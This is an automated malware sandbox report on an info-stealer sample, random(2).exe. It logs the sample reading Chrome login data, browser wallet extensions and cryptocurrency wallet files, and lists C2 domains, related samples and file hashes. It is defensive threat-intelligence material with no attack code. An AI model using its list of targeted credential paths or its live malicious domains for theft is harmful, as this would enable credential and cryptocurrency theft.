                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\ATJBEMHSSB
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\BQJUWOYRTO
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\BWETZDQDIB
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\WDBWCPEFJW
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
                Source: C:\Users\user\Desktop\random(2).exe | Directory queried: C:\Users\user\Documents\UBVUNTSCZJ
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: number of queries: 1001
                Source: Yara match, file source: 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, file source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR
                Source: Yara match, file source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: sslproxydump.pcap, type: PCAP
                MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count shown next to that technique in the report's matrix, techniques without a number carry no count):

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
                Execution: Windows Management Instrumentation (12), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
                Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (44), Process Injection (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1), Steganography
                Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
                Discovery: Query Registry (1), Security Software Discovery (851), Virtualization/Sandbox Evasion (44), Process Discovery (2), File and Directory Discovery (2), System Information Discovery (223)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
                Collection: Archive Collected Data (1), Data from Local System (31), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
                Command and Control: Encrypted Channel (11), Ingress Tool Transfer (2), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels, Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label
                random(2).exe | 56% | Virustotal |
                random(2).exe | 55% | ReversingLabs | Win32.Trojan.Symmi
                random(2).exe | 100% | Avira | TR/Crypt.XPACK.Gen
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://earthsymphzony.today:443/api | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apiEM | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apiV | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/a | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/m | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today:443/api& | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/api | 100% | Avira URL Cloud | malware
                http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
                https://earthsymphzony.today/b | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/ | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/api288 | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apij | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/a$ | 100% | Avira URL Cloud | malware
                https://bridge.sf | 0% | Avira URL Cloud | safe
                https://earthsymphzony.today/apiy | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apic | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apix | 100% | Avira URL Cloud | malware
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | Avira URL Cloud | safe
                dawtastream.bet | 100% | Avira URL Cloud | malware
                https://earthsymphzony.today/apime | 100% | Avira URL Cloud | malware
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                earthsymphzony.today | 104.21.64.1 | true | true | | unknown
                foresctwhispers.top | unknown | unknown | false | | high
                collapimga.fun | unknown | unknown | true | | unknown
                quietswtreams.life | unknown | unknown | true | | unknown
                tracnquilforest.life | unknown | unknown | false | | high
                strawpeasaen.fun | unknown | unknown | true | | unknown
                starrynsightsky.icu | unknown | unknown | true | | unknown
                seizedsentec.online | unknown | unknown | true | | unknown
                dawtastream.bet | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                starrynsightsky.icu | false | | high
                foresctwhispers.top | false | | high
                https://earthsymphzony.today/api | true | Avira URL Cloud: malware | unknown
                strawpeasaen.fun | false | | high
                quietswtreams.life | false | | high
                tracnquilforest.life | false | | high
                dawtastream.bet | true | Avira URL Cloud: malware | unknown
                collapimga.fun | false | | high
                seizedsentec.online | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                      high
IP:104.21.64.1
Domain:earthsymphzony.today
Country:United States
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:true
                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1629897
                                                                                                      Start date and time:2025-03-05 09:15:54 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 5m 24s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:random(2).exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/12@9/1
                                                                                                      EGA Information:Failed
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 0
                                                                                                      • Number of non-executed functions: 4
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.60, 4.245.163.56
                                                                                                      • Excluded domains from analysis (whitelisted): 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target random(2).exe, PID 6644 because there are no executed function
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time:03:16:53
Type:API Interceptor
Description:17x Sleep call for process: random(2).exe modified
Match:104.21.64.1
Associated samples (Sample Name / URL, Detection, Threat Name, Context):
• Payment.exe (Detection:malicious, Threat Name:Lokibot, Context:touxzw.ir/sccc/five/fre.php)
• 7RryusxiMtHBz80.exe (Detection:malicious, Threat Name:Lokibot, Context:touxzw.ir/sss2/five/fre.php)
• Request for quotation -6001845515-XLSX.exe (Detection:malicious, Threat Name:Lokibot, Context:touxzw.ir/tking3/five/fre.php)
• vsf098633534.exe (Detection:malicious, Threat Name:Lokibot, Context:touxzw.ir/sccc/five/fre.php)
• laser.ps1 (Detection:malicious, Threat Name:FormBook, Context:www.lucynoel6465.shop/jgkl/)
• UPDATED SOA.pdf.exe (Detection:malicious, Threat Name:FormBook, Context:www.shlomi.app/t3l4/)
• QUOTE OF DRY DOCK REPAIR.exe (Detection:malicious, Threat Name:FormBook, Context:www.arryongro-nambe.live/ljgq/)
• QUOTATION NO REQ-19-000640.exe (Detection:malicious, Threat Name:FormBook, Context:www.askvtwv8.top/2875/)
• Revised Order Confirmation.exe (Detection:malicious, Threat Name:FormBook, Context:www.lucynoel6465.shop/hbfq/)
• UPIlkrNpsh.exe (Detection:malicious, Threat Name:Unknown, Context:xerecao.cc/)
Match:earthsymphzony.today
Associated samples (Sample Name / URL, Detection, Threat Name, Context):
• xIwQcY1fc4.exe (Detection:malicious, Threat Name:Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Context:104.21.64.1)
• d5Wai5fIAK.exe (Detection:malicious, Threat Name:Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT, Context:104.21.96.1)
Match:CLOUDFLARENETUS
Associated samples (Sample Name / URL, Detection, Threat Name, Context):
• https://factuur02282025.hobroz.com/A72ECwdoRHW41EG3Gmp8VxXRzNoyMOj2Tb8ustfmZ3YbxuxVY6iqBeY3peTXljUF9rQyiBI9ykCHKooFgnf2WmWeAJO6ANfL5wdgJvhDvcajapOZGnzcrqtbhL9DDLocPstrZhMa7g4oQsSiJHNE1S/verify (Detection:malicious, Threat Name:Unknown, Context:188.114.96.3)
• random(3).exe (Detection:malicious, Threat Name:LummaC Stealer, Context:104.21.31.208)
• JqGBbm7.exe (Detection:malicious, Threat Name:LummaC Stealer, Context:104.21.31.208)
• MCxU5Fj.exe (Detection:malicious, Threat Name:LummaC Stealer, PureLog Stealer, Context:188.114.97.3)
• https://variotok.com (Detection:malicious, Threat Name:HTMLPhisher, Context:104.18.95.41)
• virut' in file 'Setup.exe', during attempted open by 'explorer.exe' (Detection:malicious, Threat Name:Unknown, Context:104.18.26.149)
• GMOgZgNpNu.exe (Detection:malicious, Threat Name:Amadey, LummaC Stealer, Context:172.67.179.246)
• xIwQcY1fc4.exe (Detection:malicious, Threat Name:Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Context:104.21.31.208)
• Payment copy-8899.exe (Detection:malicious, Threat Name:FormBook, Context:172.67.148.163)
• https://040030025.blob.core.windows.net/factura/index.html (Detection:malicious, Threat Name:Phisher, Context:1.1.1.1)
Match:a0e9f5d64349fb13191bc781f81f42e1
Associated samples (Sample Name / URL, Detection, Threat Name, Context):
• random(3).exe (Detection:malicious, Threat Name:LummaC Stealer, Context:104.21.64.1)
• JqGBbm7.exe (Detection:malicious, Threat Name:LummaC Stealer, Context:104.21.64.1)
• MCxU5Fj.exe (Detection:malicious, Threat Name:LummaC Stealer, PureLog Stealer, Context:104.21.64.1)
• GMOgZgNpNu.exe (Detection:malicious, Threat Name:Amadey, LummaC Stealer, Context:104.21.64.1)
• xIwQcY1fc4.exe (Detection:malicious, Threat Name:Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Context:104.21.64.1)
• transferencia HSBC.xla.xlsx (Detection:malicious, Threat Name:Unknown, Context:104.21.64.1)
• Order Confirmation.xls (Detection:malicious, Threat Name:Unknown, Context:104.21.64.1)
• transferencia HSBC.xla.xlsx (Detection:malicious, Threat Name:Unknown, Context:104.21.64.1)
• d5Wai5fIAK.exe (Detection:malicious, Threat Name:Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT, Context:104.21.64.1)
• VER_3316ARUGVHQMejzy7451UUFA.vbs (Detection:malicious, Threat Name:Unknown, Context:104.21.64.1)
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.137181696973627
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):229376
                                                                                                      Entropy (8bit):0.6427006845395496
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:A1zkVmvQhyn+Zoz67NNlXMM6333Jp/LKXKN8/N7ty:AmzMMaCm
                                                                                                      MD5:6CA0EA47AA85DCD76B93813012C88F5C
                                                                                                      SHA1:9E7DBE4BD585D31BBE548864FBAD5EDF203FA585
                                                                                                      SHA-256:D6F41AFDC2FEF2D0CDF9A3325488A2530C828EA1D76D51DEE2EF6005F14F6FF2
                                                                                                      SHA-512:1F9CAE33E76C22048363702B4DEF76FEB52BC7F98C1DBC3CFF311F553756069000C9EE0C64B505489D73591AF99EDCD19FAE5DB55C62BFE9A5D6080A84763ABD
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51200
                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.848598812124929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                      MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                      SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                      SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                      SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):159744
                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5242880
                                                                                                      Entropy (8bit):0.03786218306281921
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                      MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                      SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                      SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                      SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
